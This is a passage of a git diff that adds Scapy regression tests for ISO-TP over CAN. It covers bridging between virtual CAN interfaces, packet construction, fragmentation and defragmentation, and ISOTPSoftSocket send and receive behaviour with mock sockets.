sid=0x641, did=0x241) +bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) + +bridgeStarted = threading.Event() +def bridge(): + global bridgeStarted + global bSucc + def forwarding(pkt): + return pkt + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, started_callback=bridgeStarted.set, count=2) + bSocket0.close() + bSocket1.close() + bSucc = True + +threadBridge = threading.Thread(target=bridge) +threadBridge.start() +bridgeStarted.wait(timeout=5) + +packetVcan0 = ISOTP(b'RequestVcan0') +packetVcan1 = ISOTP(b'RequestVcan1') +isoTpSocket0.send(packetVcan0) +isoTpSocket1.send(packetVcan1) + +packetsVCan0 = isoTpSocket0.sniff(timeout=0.5, count=1) +packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, count=1) + +len(packetsVCan0) == 1 +len(packetsVCan1) == 1 + +isoTpSocket0.close() +isoTpSocket1.close() + +threadBridge.join(timeout=5) +assert not threadBridge.is_alive() + +assert(bSucc) + += bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change in both directions +exit_if_no_isotp_module() + +bSucc = False + +isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) +bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) + +bridgeStarted = threading.Event() +def bridge(): + global bridgeStarted + global bSucc + def forwarding(pkt): + pkt.data = 'changed' + return pkt + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, started_callback=bridgeStarted.set, count=2) + bSocket0.close() + bSocket1.close() + bSucc = True + +threadBridge = threading.Thread(target=bridge) +threadBridge.start() +bridgeStarted.wait(timeout=5) + +packetVcan0 = ISOTP(b'RequestVcan0') +packetVcan1 = ISOTP(b'RequestVcan1') +isoTpSocket0.send(packetVcan0) +isoTpSocket1.send(packetVcan1) + +packetsVCan0 = isoTpSocket0.sniff(timeout=0.5, count=1) +packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, count=1) + +packetsVCan0[0].data = b'changed' +assert len(packetsVCan0) == 1 +packetsVCan1[0].data = b'changed' +assert len(packetsVCan1) == 1 + +isoTpSocket0.close() +isoTpSocket1.close() + +threadBridge.join(timeout=5) +assert not threadBridge.is_alive() + +assert(bSucc) + ++ Cleanup + += Cleanup reference to ISOTPSoftSocket to let the thread end +s = None + += Delete vcan interfaces + +assert cleanup_interfaces() diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts new file mode 100644 index 00000000000..6b3c6708767 --- /dev/null +++ b/test/contrib/isotp_packet.uts @@ -0,0 +1,465 @@ +% Regression tests for ISOTP packet definitions + ++ Configuration +~ conf + += Import isotp + +conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} + +load_layer("can", globals_dict=globals()) +load_contrib("isotp", globals_dict=globals()) +from scapy.contrib.isotp.isotp_scanner import get_isotp_packet + += Define helpers + +# hexadecimal to bytes convenience function +if six.PY2: + dhex = lambda s: "".join(s.split()).decode('hex') +else: + dhex = bytes.fromhex + + ++ ISOTP packet check + += Creation of an empty ISOTP packet +p = ISOTP() +assert(p.data == b"") +assert(p.src is None and p.dst is None and p.exsrc is None and p.exdst is None) +assert(bytes(p) == b"") + += Creation of a simple ISOTP packet with src +p = ISOTP(b"eee", src=0x241) +assert(p.src == 0x241) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with exsrc +p = ISOTP(b"eee", exsrc=0x41) +assert(p.exsrc == 0x41) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with dst +p = ISOTP(b"eee", dst=0x241) +assert(p.dst == 0x241) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with exdst +p = ISOTP(b"eee", exdst=0x41) +assert(p.exdst == 0x41) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += Creation of a simple ISOTP packet with src, dst, exsrc, exdst +p = ISOTP(b"eee", src=1, dst=2, exsrc=3, exdst=4) +assert(p.dst == 2) +assert(p.exdst == 4) +assert(p.src == 1) +assert(p.exsrc == 3) +assert(p.data == b"eee") +assert(bytes(p) == b"eee") + += ISOTP answers test +p = ISOTP() +r = ISOTP() +assert(p.data == b"") +assert(p.answers(r)) +assert(not p.answers(Raw())) + + += Creation of a simple ISOTP packet with src validation error +ex = False +try: + p = ISOTP(b"eee", src=0x1000000000, dst=2, exsrc=3, exdst=4) +except Scapy_Exception: + ex = True + +assert ex + += Creation of a simple ISOTP packet with dst validation error +ex = False +try: + p = ISOTP(b"eee", src=0x10, dst=0x20000000000, exsrc=3, exdst=4) +except Scapy_Exception: + ex = True + +assert ex + += Creation of a simple ISOTP packet with exsrc validation error +ex = False +try: + p = ISOTP(b"eee", src=0x10, dst=2, exsrc=3000, exdst=4) +except Scapy_Exception: + ex = True + +assert ex + + += Creation of a simple ISOTP packet with exdst validation error +ex = False +try: + p = ISOTP(b"eee", src=0x10, dst=2, exsrc=30, exdst=400) +except Scapy_Exception: + ex = True + +assert ex + ++ ISOTPFrame related checks + += Build a packet with extended addressing +pkt = CAN(identifier=0x123, data=b'\x42\x10\xff\xde\xea\xdd\xaa\xaa') +isotpex = ISOTPHeaderEA(bytes(pkt)) +assert(isotpex.type == 1) +assert(isotpex.message_size == 0xff) +assert(isotpex.extended_address == 0x42) +assert(isotpex.identifier == 0x123) +assert(isotpex.length == 8) + += Build a packet with normal addressing +pkt = CAN(identifier=0x123, data=b'\x10\xff\xde\xea\xdd\xaa\xaa') +isotpno = ISOTPHeader(bytes(pkt)) +assert(isotpno.type == 1) +assert(isotpno.message_size == 0xff) +assert(isotpno.identifier == 0x123) +assert(isotpno.length == 7) + += Compare both isotp payloads +assert(isotpno.data == isotpex.data) +assert(isotpno.message_size == isotpex.message_size) + += Dissect multiple packets +frames = \ + [b'\x00\x00\x00\x00\x08\x00\x00\x00\x10(\xde\xad\xbe\xef\xde\xad', + b'\x00\x00\x00\x00\x08\x00\x00\x00!\xbe\xef\xde\xad\xbe\xef\xde', + b'\x00\x00\x00\x00\x08\x00\x00\x00"\xad\xbe\xef\xde\xad\xbe\xef', + b'\x00\x00\x00\x00\x08\x00\x00\x00#\xde\xad\xbe\xef\xde\xad\xbe', + b'\x00\x00\x00\x00\x08\x00\x00\x00$\xef\xde\xad\xbe\xef\xde\xad', + b'\x00\x00\x00\x00\x07\x00\x00\x00%\xbe\xef\xde\xad\xbe\xef'] + +isotpframes = [ISOTPHeader(x) for x in frames] + +assert(isotpframes[0].type == 1) +assert(isotpframes[0].message_size == 40) +assert(isotpframes[0].length == 8) +assert(isotpframes[1].type == 2) +assert(isotpframes[1].index == 1) +assert(isotpframes[1].length == 8) +assert(isotpframes[2].type == 2) +assert(isotpframes[2].index == 2) +assert(isotpframes[2].length == 8) +assert(isotpframes[3].type == 2) +assert(isotpframes[3].index == 3) +assert(isotpframes[3].length == 8) +assert(isotpframes[4].type == 2) +assert(isotpframes[4].index == 4) +assert(isotpframes[4].length == 8) +assert(isotpframes[5].type == 2) +assert(isotpframes[5].index == 5) +assert(isotpframes[5].length == 7) + += Build SF frame with constructor, check for correct length assignments +p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_SF(data=b'\xad\xbe\xad\xff'))) +assert(p.length == 5) +assert(p.message_size == 4) +assert(len(p.data) == 4) +assert(p.data == b'\xad\xbe\xad\xff') +assert(p.type == 0) +assert(p.identifier == 0) + += Build SF frame EA with constructor, check for correct length assignments +p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_SF(data=b'\xad\xbe\xad\xff'))) +assert(p.extended_address == 0) +assert(p.length == 6) +assert(p.message_size == 4) +assert(len(p.data) == 4) +assert(p.data == b'\xad\xbe\xad\xff') +assert(p.type == 0) +assert(p.identifier == 0) + += Build FF frame with constructor, check for correct length assignments +p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=10, data=b'\xad\xbe\xad\xff'))) +assert(p.length == 6) +assert(p.message_size == 10) +assert(len(p.data) == 4) +assert(p.data == b'\xad\xbe\xad\xff') +assert(p.type == 1) +assert(p.identifier == 0) + += Build FF frame EA with constructor, check for correct length assignments +p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=10, data=b'\xad\xbe\xad\xff'))) +assert(p.extended_address == 0) +assert(p.length == 7) +assert(p.message_size == 10) +assert(len(p.data) == 4) +assert(p.data == b'\xad\xbe\xad\xff') +assert(p.type == 1) +assert(p.identifier == 0) + += Build FF frame EA, extended size, with constructor, check for correct length assignments +p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=0, + extended_message_size=2000, + data=b'\xad'))) +assert(p.extended_address == 0) +assert(p.length == 8) +assert(p.message_size == 0) +assert(p.extended_message_size == 2000) +assert(len(p.data) == 1) +assert(p.data == b'\xad') +assert(p.type == 1) +assert(p.identifier == 0) + += Build FF frame, extended size, with constructor, check for correct length assignments +p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=0, + extended_message_size=2000, + data=b'\xad'))) +assert(p.length == 7) +assert(p.message_size == 0) +assert(p.extended_message_size == 2000) +assert(len(p.data) == 1) +assert(p.data == b'\xad') +assert(p.type == 1) +assert(p.identifier == 0) + += Build CF frame with constructor, check for correct length assignments +p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_CF(data=b'\xad'))) +assert(p.length == 2) +assert(p.index == 0) +assert(len(p.data) == 1) +assert(p.data == b'\xad') +assert(p.type == 2) +assert(p.identifier == 0) + += Build CF frame EA with constructor, check for correct length assignments +p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_CF(data=b'\xad'))) +assert(p.length == 3) +assert(p.index == 0) +assert(len(p.data) == 1) +assert(p.data == b'\xad') +assert(p.type == 2) +assert(p.identifier == 0) + += Build FC frame EA with constructor, check for correct length assignments +p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FC())) +assert(p.length == 4) +assert(p.block_size == 0) +assert(p.separation_time == 0) +assert(p.type == 3) +assert(p.identifier == 0) + += Build FC frame with constructor, check for correct length assignments +p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FC())) +assert(p.length == 3) +assert(p.block_size == 0) +assert(p.separation_time == 0) +assert(p.type == 3) +assert(p.identifier == 0) + += Construct some single frames +p = ISOTPHeader(identifier=0x123, length=5)/ISOTP_SF(message_size=4, data=b'abcd') +assert(p.length == 5) +assert(p.identifier == 0x123) +assert(p.type == 0) +assert(p.message_size == 4) +assert(p.data == b'abcd') + += Construct some single frames EA +p = ISOTPHeaderEA(identifier=0x123, length=6, extended_address=42)/ISOTP_SF(message_size=4, data=b'abcd') +assert(p.length == 6) +assert(p.extended_address == 42) +assert(p.identifier == 0x123) +assert(p.type == 0) +assert(p.message_size == 4) +assert(p.data == b'abcd') + += Construct ISOTP_packet with extended can frame +p = get_isotp_packet(identifier=0x1234, extended=False, extended_can_id=True) +print(p) +assert (p.identifier == 0x1234) +assert (p.flags == "extended") + += Construct ISOTPEA_Packet with extended can frame +p = get_isotp_packet(identifier=0x1234, extended=True, extended_can_id=True) +print(p) +assert (p.identifier == 0x1234) +assert (p.flags == "extended") + ++ ISOTP fragment and defragment checks + += Fragment an empty ISOTP message +fragments = ISOTP().fragment() +assert(len(fragments) == 1) +assert(fragments[0].data == b"\0") + += Fragment another empty ISOTP message +fragments = ISOTP(b"").fragment() +assert(len(fragments) == 1) +assert(fragments[0].data == b"\0") + += Fragment a 4 bytes long ISOTP message +fragments = ISOTP(b"data", src=0x241).fragment() +assert(len(fragments) == 1) +assert(isinstance(fragments[0], CAN)) +fragment = CAN(bytes(fragments[0])) +assert(fragment.data == b"\x04data") +assert(fragment.flags == 0) +assert(fragment.length == 5) +assert(fragment.reserved == 0) + += Fragment a 4 bytes long ISOTP message extended +fragments = ISOTP(b"data", dst=0x1fff0000).fragment() +assert(len(fragments) == 1) +assert(isinstance(fragments[0], CAN)) +fragment = CAN(bytes(fragments[0])) +assert(fragment.data == b"\x04data") +assert(fragment.length == 5) +assert(fragment.reserved == 0) +assert(fragment.flags == 4) + += Fragment a 8 bytes long ISOTP message extended +fragments = ISOTP(b"datadata", dst=0x1fff0000).fragment() +assert(len(fragments) == 2) +assert(isinstance(fragments[0], CAN)) +fragment = CAN(bytes(fragments[0])) +assert(fragment.data == b"\x10\x08datada") +assert(fragment.length == 8) +assert(fragment.reserved == 0) +assert(fragment.flags == 4) +fragment = CAN(bytes(fragments[1])) +assert(fragment.data == b"\x21ta") +assert(fragment.length == 3) +assert(fragment.reserved == 0) +assert(fragment.flags == 4) + += Fragment a 7 bytes long ISOTP message +fragments = ISOTP(b"abcdefg").fragment() +assert(len(fragments) == 1) +assert(fragments[0].data == b"\x07abcdefg") + += Fragment a 8 bytes long ISOTP message +fragments = ISOTP(b"abcdefgh").fragment() +assert(len(fragments) == 2) +assert(fragments[0].data == b"\x10\x08abcdef") +assert(fragments[1].data == b"\x21gh") + += Fragment an ISOTP message with extended addressing +isotp = ISOTP(b"abcdef", exdst=ord('A')) +fragments = isotp.fragment() +assert(len(fragments) == 1) +assert(fragments[0].data == b"A\x06abcdef") + += Fragment a 7 bytes ISOTP message with destination identifier +isotp = ISOTP(b"abcdefg", dst=0x64f) +fragments = isotp.fragment() +assert(len(fragments) == 1) +assert(fragments[0].data == b"\x07abcdefg") +assert(fragments[0].identifier == 0x64f) + += Fragment a 16 bytes ISOTP message with extended addressing +isotp = ISOTP(b"abcdefghijklmnop", dst=0x64f, exdst=ord('A')) +fragments = isotp.fragment() +assert(len(fragments) == 3) +assert(fragments[0].data == b"A\x10\x10abcde") +assert(fragments[1].data == b"A\x21fghijk") +assert(fragments[2].data == b"A\x22lmnop") +assert(fragments[0].identifier == 0x64f) +assert(fragments[1].identifier == 0x64f) +assert(fragments[2].identifier == 0x64f) + += Fragment a huge ISOTP message, 4997 bytes long +data = b"T" * 4997 +isotp = ISOTP(b"T" * 4997, dst=0x345) +fragments = isotp.fragment() +assert(len(fragments) == 715) +assert(fragments[0].data == dhex("10 00 00 00 13 85") + b"TT") +assert(fragments[1].data == b"\x21TTTTTTT") +assert(fragments[-2].data == b"\x29TTTTTTT") +assert(fragments[-1].data == b"\x2ATTTT") + += Defragment a single-frame ISOTP message +fragments = [CAN(identifier=0x641, data=b"\x04test")] +isotp = ISOTP.defragment(fragments) +isotp.show() +assert(isotp.data == b"test") +assert(isotp.dst == 0x641) + += Defragment non ISOTP message +fragments = [CAN(identifier=0x641, data=b"\xa4test")] +isotp = ISOTP.defragment(fragments) +assert isotp is None + += Defragment ISOTP message with warning +fragments = [CAN(identifier=0x641, data=b"\x04test"), CAN(identifier=0x642, data=b"\x04test")] +isotp = ISOTP.defragment(fragments) +assert(isotp.data == b"test") +assert(isotp.dst == 0x641) + += Defragment exception +fragments = [] +ex = False +try: + isotp = ISOTP.defragment(fragments) + isotp.show() +except Scapy_Exception: + ex = True + +assert ex + += Fragment exception +ex = False +try: + fragments = ISOTP(b"a" * (1 << 32)).fragment() +except Scapy_Exception: + ex = True + +assert ex + += Defragment an ISOTP message composed of multiple CAN frames +fragments = [ + CAN(identifier=0x641, data=dhex("41 10 10 61 62 63 64 65")), + CAN(identifier=0x641, data=dhex("41 21 66 67 68 69 6A 6B")), + CAN(identifier=0x641, data=dhex("41 22 6C 6D 6E 6F 70 00")) +] +isotp = ISOTP.defragment(fragments) +isotp.show() +assert(isotp.data == dhex("61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70")) +assert(isotp.dst == 0x641) +assert(isotp.exdst == 0x41) + += Check if fragmenting a message and defragmenting it back yields the original message +isotp1 = ISOTP(b"abcdef", exdst=ord('A')) +fragments = isotp1.fragment() +isotp2 = ISOTP.defragment(fragments) +isotp2.show() +assert(isotp1 == isotp2) + +isotp1 = ISOTP(b"abcdefghijklmnop") +fragments = isotp1.fragment() +isotp2 = ISOTP.defragment(fragments) +isotp2.show() +assert(isotp1 == isotp2) + +isotp1 = ISOTP(b"abcdefghijklmnop", exdst=ord('A')) +fragments = isotp1.fragment() +isotp2 = ISOTP.defragment(fragments) +isotp2.show() +assert(isotp1 == isotp2) + +isotp1 = ISOTP(b"T"*5000, exdst=ord('A')) +fragments = isotp1.fragment() +isotp2 = ISOTP.defragment(fragments) +isotp2.show() +assert(isotp1 == isotp2) + += Defragment an ambiguous CAN frame +fragments = [CAN(identifier=0x641, data=dhex("02 01 AA"))] +isotp = ISOTP.defragment(fragments, False) +isotp.show() +assert(isotp.data == dhex("01 AA")) +assert(isotp.exdst == None) +isotpex = ISOTP.defragment(fragments, True) +isotpex.show() +assert(isotpex.data == dhex("AA")) +assert(isotpex.exdst == 0x02) + diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts new file mode 100644 index 00000000000..59daf3bd27f --- /dev/null +++ b/test/contrib/isotp_soft_socket.uts @@ -0,0 +1,936 @@ +% Regression tests for ISOTPSoftSocket +~ automotive_comm + ++ Configuration +~ conf + += Imports + +from scapy.modules.six.moves.queue import Queue +from io import BytesIO +import scapy.modules.six as six + +with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: + exec(f.read()) + += Definition of constants, utility functions and mock classes + + +class MockCANSocket(SuperSocket): + nonblocking_socket = True + def __init__(self, rcvd_queue=None): + self.rcvd_queue = Queue() + self.sent_queue = Queue() + if rcvd_queue is not None: + for c in rcvd_queue: + self.rcvd_queue.put(c) + def recv_raw(self, x=MTU): + pkt = bytes(self.rcvd_queue.get(True, 2)) + return CAN, pkt, None + def send(self, p): + self.sent_queue.put(p) + @staticmethod + def select(sockets, remain=None): + return sockets + +# hexadecimal to bytes convenience function +if six.PY2: + dhex = lambda s: "".join(s.split()).decode('hex') +else: + dhex = bytes.fromhex + + ++ Test sniffer += Test sniffer with multiple frames + +test_frames = [ + (0x241, "EA 10 28 01 02 03 04 05"), + (0x641, "EA 30 03 00" ), + (0x241, "EA 21 06 07 08 09 0A 0B"), + (0x241, "EA 22 0C 0D 0E 0F 10 11"), + (0x241, "EA 23 12 13 14 15 16 17"), + (0x641, "EA 30 03 00" ), + (0x241, "EA 24 18 19 1A 1B 1C 1D"), + (0x241, "EA 25 1E 1F 20 21 22 23"), + (0x241, "EA 26 24 25 26 27 28" ), +] + +with new_can_socket(iface0) as s, new_can_socket(iface0) as tx_sock: + for f in test_frames: + tx_sock.send(CAN(identifier=f[0], data=dhex(f[1]))) + sniffed = sniff(opened_socket=s, session=ISOTPSession, timeout=1, prn=lambda x: x.show2(), count=1) + +assert sniffed[0]['ISOTP'].data == bytearray(range(1, 0x29)) +assert(sniffed[0]['ISOTP'].src == 0x641) +assert(sniffed[0]['ISOTP'].exsrc is 0xEA) +assert(sniffed[0]['ISOTP'].dst == 0x241) +assert(sniffed[0]['ISOTP'].exdst is 0xEA) + ++ ISOTPSoftSocket tests + += Create ISOTPSoftSocket +cans = MockCANSocket() +s = ISOTPSoftSocket(cans, sid=0x641, did=0x241) + += Single-frame receive +cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) +msg = s.recv() +assert(msg.data == dhex("01 02 03 04 05")) +assert(cans.sent_queue.empty()) + += Single-frame send +s.send(ISOTP(dhex("01 02 03 04 05"))) +msg = cans.sent_queue.get(True, 1) +assert(msg.data == dhex("05 01 02 03 04 05")) +assert(cans.sent_queue.empty()) +assert(cans.rcvd_queue.empty()) + += Two frame receive +cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) +c = cans.sent_queue.get(True, 2) +assert (c.data == dhex("30 00 00")) +cans.rcvd_queue.put(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) +msg = s.recv() + +assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) +assert(cans.sent_queue.empty()) +assert(cans.rcvd_queue.empty()) + += 20000 bytes receive +data = dhex("01 02 03 04 05")*4000 + +cf = ISOTP(data, dst=0x241).fragment() +ff = cf.pop(0) +cans.rcvd_queue.put(ff) +c = cans.sent_queue.get(True, 2) +assert (c.data == dhex("30 00 00")) +for f in cf: + cans.rcvd_queue.put(f) + +msg = s.recv() + +assert(msg.data == data) +assert(cans.sent_queue.empty()) +assert(cans.rcvd_queue.empty()) + += 20000 bytes send + +data = dhex("01 02 03 04 05")*4000 +msg = ISOTP(data, dst=0x641) +succ = threading.Event() +ready = threading.Event() +fragments = msg.fragment() +ack = CAN(identifier=0x241, data=dhex("30 00 00")) + +def acker(): + ready.set() + ff = cans.sent_queue.get(True, 2) + assert(ff == fragments[0]) + cans.rcvd_queue.put(ack) + for fragment in fragments[1:]: + cf = cans.sent_queue.get(True, 2) + assert(fragment == cf) + succ.set() + +thread = threading.Thread(target=acker, name="acker") +thread.start() +ready.wait(timeout=5) + +s.send(msg) + +thread.join(15) +assert not thread.is_alive() +succ.wait(2) +assert(succ.is_set()) + += Close ISOTPSoftSocket + +s.close() +s = None + += Create and close ISOTP soft socket +with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) as s: + assert(s.impl.rx_thread.running) + s.close() + assert(not s.impl.rx_thread.running) + + += Verify that all threads will die when GC collects the socket +import gc +s = ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) +assert(s.impl.rx_thread.running) +impl = s.impl +s = None +r = gc.collect() +assert(not impl.rx_thread.running) + += Test on_recv function with single frame +with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) as s: + s.ins.on_recv(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) + msg, ts = s.ins.rx_queue.recv() + assert(msg == dhex("01 02 03 04 05")) + += Test on_recv function with empty frame +with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241) as s: + s.ins.on_recv(CAN(identifier=0x241, data=b"")) + assert(s.ins.rx_queue.empty()) + += Test on_recv function with single frame and extended addressing +with ISOTPSoftSocket(MockCANSocket(), sid=0x641, did=0x241, extended_rx_addr=0xea) as s: + cf = CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05")) + s.ins.on_recv(cf) + msg, ts = s.ins.rx_queue.recv() + assert(msg == dhex("01 02 03 04 05")) + assert ts == cf.time + += CF is sent when first frame is received +cans = MockCANSocket() +with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + s.ins.on_recv(CAN(identifier=0x241, data=dhex("10 20 01 02 03 04 05 06"))) + can = cans.sent_queue.get(True, 1) + assert(can.identifier == 0x641) + assert(can.data == dhex("30 00 00")) + +cans.close() + ++ Testing ISOTPSoftSocket with an actual CAN socket + += Verify that packets are not lost if they arrive before the sniff() is called +with new_can_socket(iface0) as ss, new_can_socket0() as sr: + tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x01\x23\x45\x67")) + p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) + assert(len(p)==1) + tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x89\xab\xcd\xef")) + p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) + assert(len(p)==1) + += Send single frame ISOTP message, using begin_send +with new_can_socket(iface0) as isocan, \ + ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, \ + new_can_socket0() as cans: + can = cans.sniff(timeout=2, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05")))) + assert(can[0].identifier == 0x641) + assert(can[0].data == dhex("05 01 02 03 04 05")) + += Send many single frame ISOTP messages, using begin_send + +with new_can_socket0() as isocan, \ + ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, \ + new_can_socket0() as cans: + for i in range(100): + data = dhex("01 02 03 04 05") + struct.pack("B", i) + expected = struct.pack("B", len(data)) + data + can = cans.sniff(timeout=4, count=1, started_callback=lambda: s.begin_send(ISOTP(data=data))) + assert(can[0].identifier == 0x641) + print(can[0].data, data) + assert(can[0].data == expected) + + += Send two-frame ISOTP message, using begin_send +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05 06 07 08")))) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("10 08 01 02 03 04 05 06") + can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CAN(identifier = 0x241, data=dhex("30 00 00")))) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("21 07 08") + +cans.close() + += Send single frame ISOTP message +with new_can_socket(iface0) as cans: + with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + s.send(ISOTP(data=dhex("01 02 03 04 05"))) + can = cans.sniff(timeout=1, count=1) + assert(can[0].identifier == 0x641) + assert(can[0].data == dhex("05 01 02 03 04 05")) + + += Send two-frame ISOTP message +acker_ready = threading.Event() +def acker(): + with new_can_socket(iface0) as acks: + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + can = can_pkt[0] + acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) + +thread = Thread(target=acker) +thread.start() +acker_ready.wait(timeout=5) +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) + +thread.join(15) +assert not thread.is_alive() + + += Send two-frame ISOTP message with bs + +acker_ready = threading.Event() +def acker(): + with new_can_socket(iface0) as acks: + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + acks.send(CAN(identifier = 0x241, data=dhex("30 20 00"))) + +thread = Thread(target=acker) +thread.start() +acker_ready.wait(timeout=5) +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 20 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) + +thread.join(15) +assert not thread.is_alive() + + += Send two-frame ISOTP message with ST +acker_ready = threading.Event() +def acker(): + with new_can_socket0() as acks: + acker_ready.set() + acks.sniff(timeout=1, count=1) + acks.send(CAN(identifier = 0x241, data=dhex("30 00 10"))) + +thread = Thread(target=acker) +thread.start() +acker_ready.wait(timeout=5) +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 10")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) + +thread.join(15) +assert not thread.is_alive() + += Receive a single frame ISOTP message +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05")) + assert(isotp.src == 0x641) + assert(isotp.dst == 0x241) + assert(isotp.exsrc == None) + assert(isotp.exdst == None) + + += Receive a single frame ISOTP message, with extended addressing +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05")) + assert(isotp.src == 0x641) + assert(isotp.dst == 0x241) + assert(isotp.exsrc == 0xc0) + assert(isotp.exdst == 0xea) + + += Receive frames from CandumpReader +candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA''') + +with ISOTPSoftSocket(CandumpReader(candump_fd), sid=0x241, did=0x541, listen_only=True) as s: + pkts = 